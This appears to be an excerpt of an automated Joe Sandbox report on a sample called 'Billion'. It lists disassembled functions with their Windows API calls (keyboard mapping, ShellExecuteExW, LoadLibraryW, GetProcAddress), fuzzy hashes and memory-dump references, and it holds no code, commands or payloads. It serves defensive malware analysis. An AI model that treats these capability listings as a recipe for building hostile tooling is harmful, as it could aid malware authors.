                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0a90aa616abb41ceca9250a95318dda5c0b6e3ef62f7c11d95b8d58dbdb728ec
                                                                                                                                                                                                                                                                                                          • Instruction ID: 75eedbfe58c16c6f92028095cd5a88a030d873ba386c3c58412bde4608bb179d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a90aa616abb41ceca9250a95318dda5c0b6e3ef62f7c11d95b8d58dbdb728ec
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7111B7600010DBFDF029F94EC88E9A7F6DEF08360F048026BA195A561C771DDA5DBA0
                                                                                                                                                                                                                                                                                                          Function 0013327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001332AF
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 001332B7
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001332C2
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001332CD
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 001332D5
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 001332DD
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Virtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 68184e1d36aff828deaffbd81cb1b3e5d11036714d1eae508608369e3a0a049a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d52ff4edc4ed0a29df4b9a5cece6c43bbfdaaee5f04f0fdcbf0b893e5904d12
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68184e1d36aff828deaffbd81cb1b3e5d11036714d1eae508608369e3a0a049a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 930167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                                                                                          Function 001734D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?), ref: 001734EF
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00173506
                                                                                                                                                                                                                                                                                                          • GetWindowDC.USER32(?), ref: 00173512
                                                                                                                                                                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00173521
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00173533
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0017354D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 62f8715dfce7d9db511e5b9ebc6210e000b529fe4b230aaf9364e0766a253872
                                                                                                                                                                                                                                                                                                          • Instruction ID: 36dc2918820484311e9fb088d26ad3e27f4831aaa2e2257d1bf014b15df2db68
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62f8715dfce7d9db511e5b9ebc6210e000b529fe4b230aaf9364e0766a253872
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C012431600215EFDB505BA4EC08FEABFB1FB08321F514170FA2AA25A1CB315E92AB10
                                                                                                                                                                                                                                                                                                          Function 001921C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001921CC
                                                                                                                                                                                                                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 001921D8
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001921E1
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001921E9
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001921F2
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001921F9
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 847a29b899a74e27c5508417b4dd8e28f67029415444ec7043164e43cc80a087
                                                                                                                                                                                                                                                                                                          • Instruction ID: f44bc7030d1c96e691dd24db9c5bdca857b572fb1a871721353a8b2b3cbcaa67
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 847a29b899a74e27c5508417b4dd8e28f67029415444ec7043164e43cc80a087
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDE075B6104505BBDB011FA6FC0DD4ABF79FF49722B554635F22582870CB32D4A2DB51
                                                                                                                                                                                                                                                                                                          Function 0013CF80 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0013D253
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                          • String ID: t5 $t5 $t5 $`
                                                                                                                                                                                                                                                                                                          • API String ID: 1385522511-3168467761
                                                                                                                                                                                                                                                                                                          • Opcode ID: 465fb2e53fc309b12e167655d4a360b0722f30df5e053fec1579eaed154fe092
                                                                                                                                                                                                                                                                                                          • Instruction ID: 72143eea851246727d7e3c9c0503edb09579ee1148c0b24022c3ee872bf2b4a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 465fb2e53fc309b12e167655d4a360b0722f30df5e053fec1579eaed154fe092
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69915CB5A00206CFCB18CF58E4906AABBF1FF58710F65815AE955AB351D731EE82CF90
                                                                                                                                                                                                                                                                                                          Function 001BB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 001BB903
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001341EA: _wcslen.LIBCMT ref: 001341EF
                                                                                                                                                                                                                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 001BB998
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001BB9C7
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: <$@
                                                                                                                                                                                                                                                                                                          • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4651ef4b7fe3951e2c96b75d4d4997510d49c74a9038fdcc427099e96db992d1
                                                                                                                                                                                                                                                                                                          • Instruction ID: 76437b7ae226bd641c7c40c572237b7890785d5dc35694a65e6300ecdec3458e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4651ef4b7fe3951e2c96b75d4d4997510d49c74a9038fdcc427099e96db992d1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B7177B5A00615DFCB14EF94C495A9EBBF4FF08304F0484A9E856AB7A2CB70ED45CB90
                                                                                                                                                                                                                                                                                                          Function 00197B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00197B6D
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00197BA3
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00197BB4
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00197C36
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                                          • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                                          • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                                          • Opcode ID: a44999ee5c5960da79ac8692744a584d8295d51529ff5d1cdb86908a8d65dbf6
                                                                                                                                                                                                                                                                                                          • Instruction ID: dc25a18d6e256484e50ba8df48136a7ea07de0c229978e771340c5347ee66f06
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a44999ee5c5960da79ac8692744a584d8295d51529ff5d1cdb86908a8d65dbf6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5441CFB1614205EFDF15CF64D884AAA7BB9EF44710F1480ADED0A9F285D7B0EE40CBA0
                                                                                                                                                                                                                                                                                                          Function 001C4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001C48D1
                                                                                                                                                                                                                                                                                                          • IsMenu.USER32(?), ref: 001C48E6
                                                                                                                                                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001C492E
                                                                                                                                                                                                                                                                                                          • DrawMenuBar.USER32 ref: 001C4941
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5d63d3e31c6ba2885a340825d1d7948e204bd074755a55e6ff57fc87afd1f6dc
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2cc6e5c3fc5fc7a6c979b8fdd383beec265b294a86e28653e797eada67069747
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d63d3e31c6ba2885a340825d1d7948e204bd074755a55e6ff57fc87afd1f6dc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF414775A04219EFDB10CF91E894EAABBB9FF1A328F04412DF955A7250C730ED45CBA0
                                                                                                                                                                                                                                                                                                          Function 0019272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001927B3
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001927C6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 001927F6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                                          • Opcode ID: 83d23a3895db04e712994aa962e7e47635c63337b5432b9c6dd36b2d6ea94980
                                                                                                                                                                                                                                                                                                          • Instruction ID: c56db0e3d9ca56ba5299d5905c85c3528769a811a23aa32b40167c7ab5191f26
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83d23a3895db04e712994aa962e7e47635c63337b5432b9c6dd36b2d6ea94980
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34210871A00104BFDF09ABA4DC86DFFBBB8DF553A4F104129F521A71E1DB34894ADA60
                                                                                                                                                                                                                                                                                                          Function 001C39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001C3A29
                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 001C3A30
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001C3A45
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 001C3A4D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                          • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                          • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                          • Opcode ID: b64e23a283b3bfdacf994ce23b6b6c57ca18ed188a63375c5c1d061c1bdafe34
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4cdd8c505acbe899e061a568d8854ef5e1a18e97100630fb50b58b9881c0342d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b64e23a283b3bfdacf994ce23b6b6c57ca18ed188a63375c5c1d061c1bdafe34
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F621A171600609AFEF109F64EC84FBB77A9EB65368F109229FAA1D31D0C771CD619760
                                                                                                                                                                                                                                                                                                          Function 001C9A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 001C9A5D
                                                                                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001C9A72
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 001C9ABA
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 001C9AF0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2864067406-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 83d495dd215d71df032c1e16893c85d89683d016bd78e6203a9890cd7ba378f6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 38a8cfc2cb2fe404609da1c8a9b7449c96a8eabb3334510d18d6b42b1dd4a410
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83d495dd215d71df032c1e16893c85d89683d016bd78e6203a9890cd7ba378f6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B217736600118FFCF298F94D88CEAA7BB9EB49350F504169FA058B1A2D731D990DB61
                                                                                                                                                                                                                                                                                                          Function 00131AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00131AF4
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 001731F9
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00173203
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0017320E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 4127811313-2181176062
